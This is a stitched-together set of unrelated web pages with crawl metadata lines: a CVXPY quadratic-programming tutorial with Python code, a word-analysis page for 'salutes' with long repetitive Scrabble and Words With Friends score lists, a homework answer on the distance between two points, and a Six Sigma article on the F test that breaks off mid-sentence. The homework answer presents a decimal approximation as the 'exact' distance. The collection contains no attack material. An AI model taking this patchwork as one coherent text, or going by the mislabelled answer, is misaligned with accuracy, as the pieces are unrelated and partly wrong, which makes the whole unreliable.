{"ft_lang_label":"__label__en","ft_lang_prob":0.5897032,"math_prob":0.9399205,"size":1130,"snap":"2020-24-2020-29","text_gpt3_token_len":306,"char_repetition_ratio":0.123445824,"word_repetition_ratio":0.010869565,"special_character_ratio":0.23451327,"punctuation_ratio":0.13839285,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98267025,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-06T23:46:31Z\",\"WARC-Record-ID\":\"<urn:uuid:5e945b6b-35d6-435e-a0f6-27637b8bda2b>\",\"Content-Length\":\"25659\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fb0d3b9a-9134-4c51-bf75-7531f9f4cf4f>\",\"WARC-Concurrent-To\":\"<urn:uuid:e51af3fb-406c-4ab1-9546-2c43023777a7>\",\"WARC-IP-Address\":\"176.9.3.186\",\"WARC-Target-URI\":\"https://help.scilab.org/docs/6.0.2/ru_RU/square.html\",\"WARC-Payload-Digest\":\"sha1:Q35XO6XV7J3YP2PQUUJ4BARINN2SKV6W\",\"WARC-Block-Digest\":\"sha1:KITXGCQUQ4MK55SBQMMD3SUK7WNZ3SZP\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590348521325.84_warc_CC-MAIN-20200606222233-20200607012233-00173.warc.gz\"}"}
https://www.cvxpy.org/examples/basic/quadratic_program.html
[ "A quadratic program is an optimization problem with a quadratic objective and affine equality and inequality constraints. A common standard form is the following:\n\n$\\begin{split}\\begin{array}{ll} \\mbox{minimize} & (1/2)x^TPx + q^Tx\\\\ \\mbox{subject to} & Gx \\leq h \\\\ & Ax = b. \\end{array}\\end{split}$\n\nHere $$P \\in \\mathcal{S}^{n}_+$$, $$q \\in \\mathcal{R}^n$$, $$G \\in \\mathcal{R}^{m \\times n}$$, $$h \\in \\mathcal{R}^m$$, $$A \\in \\mathcal{R}^{p \\times n}$$, and $$b \\in \\mathcal{R}^n$$ are problem data and $$x \\in \\mathcal{R}^{n}$$ is the optimization variable. The inequality constraint $$Gx \\leq h$$ is elementwise.\n\nA simple example of a quadratic program arises in finance. Suppose we have $$n$$ different stocks, an estimate $$r \\in \\mathcal{R}^n$$ of the expected return on each stock, and an estimate $$\\Sigma \\in \\mathcal{S}^{n}_+$$ of the covariance of the returns. Then we solve the optimization problem\n\n$\\begin{split}\\begin{array}{ll} \\mbox{minimize} & (1/2)x^T\\Sigma x - r^Tx\\\\ \\mbox{subject to} & x \\geq 0 \\\\ & \\mathbf{1}^Tx = 1, \\end{array}\\end{split}$\n\nto find a portfolio allocation $$x \\in \\mathcal{R}^n_+$$ that optimally balances expected return and variance of return.\n\nWhen we solve a quadratic program, in addition to a solution $$x^\\star$$, we obtain a dual solution $$\\lambda^\\star$$ corresponding to the inequality constraints. A positive entry $$\\lambda^\\star_i$$ indicates that the constraint $$g_i^Tx \\leq h_i$$ holds with equality for $$x^\\star$$ and suggests that changing $$h_i$$ would change the optimal value.\n\n## Example¶\n\nIn the following code, we solve a quadratic program with CVXPY.\n\n# Import packages.\nimport cvxpy as cp\nimport numpy as np\n\n# Generate a random non-trivial quadratic program.\nm = 15\nn = 10\np = 5\nnp.random.seed(1)\nP = np.random.randn(n, n)\nP = P.T @ P\nq = np.random.randn(n)\nG = np.random.randn(m, n)\nh = G @ np.random.randn(n)\nA = np.random.randn(p, n)\nb = np.random.randn(p)\n\n# Define and solve the CVXPY problem.\nx = cp.Variable(n)\nprob = cp.Problem(cp.Minimize((1/2)*cp.quad_form(x, P) + q.T @ x),\n[G @ x <= h,\nA @ x == b])\nprob.solve()\n\n# Print result.\nprint(\"\\nThe optimal value is\", prob.value)\nprint(\"A solution x is\")\nprint(x.value)\nprint(\"A dual solution corresponding to the inequality constraints is\")\nprint(prob.constraints.dual_value)\n\nThe optimal value is 86.89141585569918\nA solution x is\n[-1.68244521 0.29769913 -2.38772183 -2.79986015 1.18270433 -0.20911897\n-4.50993526 3.76683701 -0.45770675 -3.78589638]\nA dual solution corresponding to the inequality constraints is\n[ 0. 0. 0. 0. 0. 10.45538054\n0. 0. 0. 39.67365045 0. 0.\n0. 20.79927156 6.54115873]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7020929,"math_prob":0.9999963,"size":2342,"snap":"2020-45-2020-50","text_gpt3_token_len":726,"char_repetition_ratio":0.13601369,"word_repetition_ratio":0.017595308,"special_character_ratio":0.35781384,"punctuation_ratio":0.16768916,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000048,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-30T14:09:55Z\",\"WARC-Record-ID\":\"<urn:uuid:db72dcd9-2b12-45d2-9b7c-28fd024fee05>\",\"Content-Length\":\"15724\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cb88bdf1-9104-4553-a3ec-a405e70f2858>\",\"WARC-Concurrent-To\":\"<urn:uuid:b961987b-0f84-4ddd-be0e-9a6c44db546a>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://www.cvxpy.org/examples/basic/quadratic_program.html\",\"WARC-Payload-Digest\":\"sha1:UTYRE2NAZX7X4MWXWAFYOJ7L3OASZJJG\",\"WARC-Block-Digest\":\"sha1:D42M662UY7STDPJYFFYXUWO5J7HAWYG7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107910815.89_warc_CC-MAIN-20201030122851-20201030152851-00353.warc.gz\"}"}
https://www.litscape.com/word_analysis/salutes
[ "# Definition of salutes\n\n## \"salutes\" in the noun sense\n\n### 1. salute, salutation\n\nan act of honor or courteous recognition\n\n\"a musical salute to the composer on his birthday\"\n\n### 2. salute, military greeting\n\na formal military gesture of respect\n\n### 3. salute\n\nan act of greeting with friendly words and gestures like bowing or lifting the hat\n\n## \"salutes\" in the verb sense\n\n### 1. toast, drink, pledge, salute, wassail\n\npropose a toast to\n\n\"Let us toast the birthday girl!\"\n\n\"Let's drink to the New Year\"\n\n### 2. salute\n\ngreet in a friendly way\n\n\"I meet this men every day on my way to work and he salutes me\"\n\n### 3. salute\n\nexpress commendation of\n\n### 4. salute\n\nbecome noticeable\n\n\"a terrible stench saluted our nostrils\"\n\n### 5. salute\n\nhonor with a military ceremony, as when honoring dead soldiers\n\n### 6. salute, present\n\nrecognize with a gesture prescribed by a military regulation assume a prescribed position\n\n\"When the officers show up, the soldiers have to salute\"\n\nSource: WordNet® (An amazing lexical database of English)\n\nWordNet®. Princeton University. 2010.\n\n# salutes in Scrabble®\n\nThe word salutes is playable in Scrabble®, no blanks required.\n\nTALUSES\n(78 = 28 + 50)\nSALUTES\n(78 = 28 + 50)\n\nsalutes, taluses\n\nSALUTES\n(78 = 28 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(71 = 21 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(60 = 10 + 50)\nSALUTES\n(60 = 10 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(58 = 8 + 50)\n\nTALUSES\n(78 = 28 + 50)\nSALUTES\n(78 = 28 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nSALUTES\n(74 = 24 + 50)\nTALUSES\n(74 = 24 + 50)\nTALUSES\n(71 = 21 + 50)\nSALUTES\n(71 = 21 + 50)\nSALUTES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nTALUSES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nSALUTES\n(68 = 18 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nSALUTES\n(66 = 16 + 50)\nTALUSES\n(66 = 16 + 50)\nTALUSES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nTALUSES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(64 = 14 + 50)\nSALUTES\n(61 = 11 + 50)\nTALUSES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nSALUTES\n(61 = 11 + 50)\nTALUSES\n(61 = 11 + 50)\nTALUSES\n(61 = 11 + 50)\nTALUSES\n(60 = 10 + 50)\nSALUTES\n(60 = 10 + 50)\nTALUSES\n(60 = 10 + 50)\nSALUTES\n(60 = 10 + 50)\nTALUSES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nSALUTES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nTALUSES\n(59 = 9 + 50)\nSALUTES\n(58 = 8 + 50)\nTALUSES\n(58 = 8 + 50)\nTASSEL\n(21)\nSLATES\n(21)\nTESLAS\n(21)\nSAUTES\n(21)\nSALUTE\n(21)\nSLATES\n(21)\nSTALES\n(21)\nSALUTE\n(21)\nSLATES\n(21)\nSALUTE\n(21)\nSLATES\n(21)\nTESLAS\n(21)\nSAUTES\n(21)\nSAUTES\n(21)\nSTALES\n(21)\nTASSEL\n(21)\nTASSEL\n(21)\nSTALES\n(21)\nTASSEL\n(21)\nTESLAS\n(21)\nSTALES\n(21)\nSALUTE\n(21)\nSTALES\n(21)\nSAUTES\n(21)\nTESLAS\n(21)\nSAUTES\n(21)\nTASSEL\n(21)\nSAUTES\n(21)\nSTALES\n(21)\nTASSEL\n(21)\nSALUTE\n(21)\nSTEALS\n(21)\nSTEALS\n(21)\nSALUTE\n(21)\nTUSSLE\n(21)\nTUSSLE\n(21)\nTUSSLE\n(21)\nTUSSLE\n(21)\nSLATES\n(21)\nSLATES\n(21)\nSTEALS\n(21)\nTUSSLE\n(21)\nTESLAS\n(21)\nSTEALS\n(21)\nTESLAS\n(21)\nSTEALS\n(21)\nTUSSLE\n(21)\nSTEALS\n(21)\nLASTS\n(18)\nLEAST\n(18)\nLEAST\n(18)\nLEAST\n(18)\nTALUS\n(18)\nLUSTS\n(18)\nTESLA\n(18)\nLUSTS\n(18)\nLUSTS\n(18)\nLUSTS\n(18)\nLEAST\n(18)\nLASTS\n(18)\nTESLA\n(18)\nTALUS\n(18)\nSALUTE\n(18)\nTASSEL\n(18)\nSALES\n(18)\nSALUTE\n(18)\nSALTS\n(18)\nSALTS\n(18)\nSALTS\n(18)\nSALTS\n(18)\nTEALS\n(18)\nTEALS\n(18)\nTALES\n(18)\nTALES\n(18)\nSALES\n(18)\nSALES\n(18)\nTALUS\n(18)\nTALES\n(18)\nTALES\n(18)\nTEALS\n(18)\nLASTS\n(18)\nLUTES\n(18)\nLUTES\n(18)\nLUTES\n(18)\nTEALS\n(18)\nLASTS\n(18)\nLUTES\n(18)\nTASSEL\n(18)\nTALUS\n(18)\nSALES\n(18)\nTESLA\n(18)\nSLATS\n(18)\nSEATS\n(18)\nSTEAL\n(18)\nSTEAL\n(18)\nTUSSLE\n(18)\nSLATS\n(18)\nSLATS\n(18)\nSLATS\n(18)\nSTALE\n(18)\nTUSSLE\n(18)\nSTALE\n(18)\nSTEALS\n(18)\nSTALE\n(18)\nSTALES\n(18)\nSEALS\n(18)\nSEALS\n(18)\nSEALS\n(18)\nSEATS\n(18)\nSEATS\n(18)\nSTALES\n(18)\nSLATE\n(18)\nASSET\n(18)\nSETAL\n(18)\nSETAL\n(18)\nSETAL\n(18)\n\n# salutes in Words With Friends™\n\nThe word salutes is playable in Words With Friends™, no blanks required.\n\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\n\nsalutes, taluses\n\nSALUTES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(61 = 26 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(50 = 15 + 35)\nSALUTES\n(50 = 15 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(44 = 9 + 35)\n\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(80 = 45 + 35)\nSALUTES\n(80 = 45 + 35)\nTALUSES\n(74 = 39 + 35)\nTALUSES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nTALUSES\n(74 = 39 + 35)\nSALUTES\n(74 = 39 + 35)\nTALUSES\n(71 = 36 + 35)\nTALUSES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nSALUTES\n(71 = 36 + 35)\nTALUSES\n(71 = 36 + 35)\nTALUSES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nTALUSES\n(68 = 33 + 35)\nTALUSES\n(68 = 33 + 35)\nTALUSES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nSALUTES\n(68 = 33 + 35)\nTALUSES\n(61 = 26 + 35)\nSALUTES\n(61 = 26 + 35)\nTALUSES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nTALUSES\n(57 = 22 + 35)\nSALUTES\n(57 = 22 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nSALUTES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(55 = 20 + 35)\nTALUSES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nSALUTES\n(53 = 18 + 35)\nTALUSES\n(53 = 18 + 35)\nTALUSES\n(50 = 15 + 35)\nSALUTES\n(50 = 15 + 35)\nSALUTES\n(50 = 15 + 35)\nTALUSES\n(50 = 15 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nTALUSES\n(48 = 13 + 35)\nSALUTES\n(48 = 13 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nTALUSES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nSALUTES\n(47 = 12 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nSALUTES\n(46 = 11 + 35)\nTALUSES\n(46 = 11 + 35)\nTALUSES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nTALUSES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nTALUSES\n(45 = 10 + 35)\nSALUTES\n(45 = 10 + 35)\nSALUTES\n(44 = 9 + 35)\nTALUSES\n(44 = 9 + 35)\nSALUTE\n(42)\nSALUTE\n(42)\nSAUTES\n(39)\nTASSEL\n(39)\nSTALES\n(39)\nTESLAS\n(39)\nTUSSLE\n(36)\nTUSSLE\n(36)\nTUSSLE\n(36)\nTUSSLE\n(36)\nSALUTE\n(36)\nSALUTE\n(36)\nTESLAS\n(33)\nTASSEL\n(33)\nTASSEL\n(33)\nLUTES\n(33)\nLUSTS\n(33)\nSTEALS\n(33)\nTESLAS\n(33)\nLUTES\n(33)\nLUSTS\n(33)\nSTEALS\n(33)\nSAUTES\n(33)\nSTEALS\n(33)\nTALUS\n(33)\nSTALES\n(33)\nSLATES\n(33)\nSAUTES\n(33)\nSLATES\n(33)\nSLATES\n(33)\nSTALES\n(33)\nTUSSLE\n(32)\nSALUTE\n(32)\nSALUTE\n(32)\nTUSSLE\n(32)\nSALUTE\n(30)\nTUSSLE\n(30)\nLASTS\n(30)\nSALUTE\n(30)\nSLATS\n(30)\nLEAST\n(30)\nLUST\n(30)\nSTALE\n(30)\nSETAL\n(30)\nSALUTE\n(30)\nSEALS\n(30)\nTUSSLE\n(30)\nLUTE\n(30)\nSALUTE\n(30)\nLEUS\n(30)\nTUSSLE\n(30)\nTUSSLE\n(30)\nSUETS\n(30)\nSTEAL\n(30)\nSLATE\n(30)\nTESLA\n(30)\nTEALS\n(30)\nSTEALS\n(28)\nSTALES\n(28)\nSTALES\n(28)\nTESLAS\n(28)\nLUSTS\n(28)\nTASSEL\n(28)\nTESLAS\n(28)\nSAUTES\n(28)\nSTEALS\n(28)\nTASSEL\n(28)\nSLATES\n(28)\nTALUS\n(28)\nLUTES\n(28)\nSLATES\n(28)\nSAUTES\n(28)\nSTALES\n(27)\nTALUS\n(27)\nTALUS\n(27)\nTALUS\n(27)\nLATE\n(27)\nLETS\n(27)\nSTEALS\n(27)\nSTEALS\n(27)\nLAST\n(27)\nSTALES\n(27)\nLEAS\n(27)\nSTALES\n(27)\n\nlute lutes\n\nlute salute\n\nresalutes" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84058064,"math_prob":1.000009,"size":1074,"snap":"2020-10-2020-16","text_gpt3_token_len":263,"char_repetition_ratio":0.13738318,"word_repetition_ratio":0.0,"special_character_ratio":0.22346368,"punctuation_ratio":0.12437811,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998456,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-20T15:34:15Z\",\"WARC-Record-ID\":\"<urn:uuid:771c6a22-5fb2-48e8-bab7-bc22cd8dc3ff>\",\"Content-Length\":\"147156\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d24d56dd-ff6d-43c4-8aa9-488f732e44ab>\",\"WARC-Concurrent-To\":\"<urn:uuid:5279a0b4-229c-4cd4-a42c-d56fa168f4da>\",\"WARC-IP-Address\":\"104.18.51.165\",\"WARC-Target-URI\":\"https://www.litscape.com/word_analysis/salutes\",\"WARC-Payload-Digest\":\"sha1:A2C5NQHLWVTILH7WUGXDI6D6WKITWC7O\",\"WARC-Block-Digest\":\"sha1:WPM3GXMSRGZ3PSCCS3EW3UO5W2AF4PPZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875144979.91_warc_CC-MAIN-20200220131529-20200220161529-00391.warc.gz\"}"}
https://documen.tv/question/find-the-distance-between-the-points-t-13-1-6-and-v-5-4-3-7-answer-in-simplest-eact-form-the-eac-28290909-50/
[ "# Find the distance between the points T(13, 1.6) and V(5.4, 3.7). Answer in simplest exact form. The exact distance between t\n\nQuestion\n\nFind the distance between the points T(13, 1.6) and V(5.4, 3.7). Answer in simplest exact form.\nThe exact distance between the two points is\n\nin progress 0\n4 weeks 2023-01-09T18:31:56+00:00 1 Answer 0 views 0\n\n1. The exact distance between the two points is 7.884795495 units.\nIn the question, we are asked to find the distance between the points T(13, 1.6) and V(5.4, 3.7).\nWe know that the between any two points A(x₁, y₁) and B(x₂, y₂) can be computed using the distance formula as:\nAB = √((x₂ – x₁)² + (y₂ – y₁)²).\nFrom the question, we take A(x₁, y₁) as T(13, 1.6) and B(x₂, y₂) as V(5.4, 3.7).\nThus, the distance between T and V can be shown as:\nTV = √((5.4 – 13)² + (3.7 – 1.6)²),\nor, TV = √((-7.6)² + (2.1)²),\nor, TV = √(57.76 + 4.41),\nor, TV = √(62.17),\nor, TV = 7.884795495.\nThus, The exact distance between the two points is 7.884795495 units." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79292935,"math_prob":0.99990416,"size":402,"snap":"2022-40-2023-06","text_gpt3_token_len":143,"char_repetition_ratio":0.15326633,"word_repetition_ratio":0.52459013,"special_character_ratio":0.39303482,"punctuation_ratio":0.1904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997131,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-05T21:34:55Z\",\"WARC-Record-ID\":\"<urn:uuid:96a3343a-68ee-4f03-b6ce-e1a5b37cd51c>\",\"Content-Length\":\"94272\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:99cc33a7-37f9-473f-af7b-c5caf5d63548>\",\"WARC-Concurrent-To\":\"<urn:uuid:362dba40-1346-404b-9fca-95084eaf462b>\",\"WARC-IP-Address\":\"5.78.45.21\",\"WARC-Target-URI\":\"https://documen.tv/question/find-the-distance-between-the-points-t-13-1-6-and-v-5-4-3-7-answer-in-simplest-eact-form-the-eac-28290909-50/\",\"WARC-Payload-Digest\":\"sha1:HR5HEBKU523PSY46EHUVPHCRQH6N77PE\",\"WARC-Block-Digest\":\"sha1:I3DZIU2VB5IQYJVL6UWNJU3LZSZEBS4L\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500288.69_warc_CC-MAIN-20230205193202-20230205223202-00495.warc.gz\"}"}
https://www.isixsigma.com/dictionary/f-test/
[ "You often want to determine whether there is a difference in means between one, two or more groups of sample data. Likewise, you will also want to know about the variances between those groups. Let’s see how you can use the F test to do that.\n\n## Overview: What is the F test?\n\nThe F Test is a generic term for any test that uses the F-distribution. Typically you hear about the F-Test in the context of comparing variances, Analysis of Variance (ANOVA) and regression analysis. The name was coined by George W. Snedecor in honor of the famed mathematician and statistician, Sir Ronald Fisher. Fisher initially developed the statistic as the variance ratio in the 1920s.\n\nThe F test uses a ratio of the variances of your data groups. The null hypothesis (Ho) for the F test is that all variances are equal. If you wanted to determine whether one group of data came from the same population as another group, you would use the ratio of the larger variance over the smaller one. You would use the resulting F value and the F distribution to determine whether you could conclude the value of that ratio would allow you to reject the null hypothesis.\n\nWhen the F ratio value is small (close to 1), the value of the numerator is close to the value of the denominator and you cannot reject the null hypothesis. However, when the F ratio is sufficiently large, that is an indication the value of the numerator is substantially different than the denominator and you can reject the null.\n\n## An industry example of the F test\n\nThe company Six Sigma Black Belt (BB) was interested in whether the invoice processing time was reduced after some improvement activities. She used a 2-sample t-test to test the difference in the average processing time and found no statistically significant difference.\n\nShe then decided to see if there was an improvement in the variation of the processing time. You can see the results below. She was happy to see that variation had been reduced and processing time was now more predictable so the manager could do a better job planning the work.", null, "### What is the F test used for?\n\nThe F test is used to test the equality of population variances.\n\n### What is the difference between the F test, F ratio and F value?\n\nThe F test is used to test the difference between population variances. In ANOVA, the F ratio is the ratio of the variation between sample means and the variation within sample means. The F value is the resulting value from 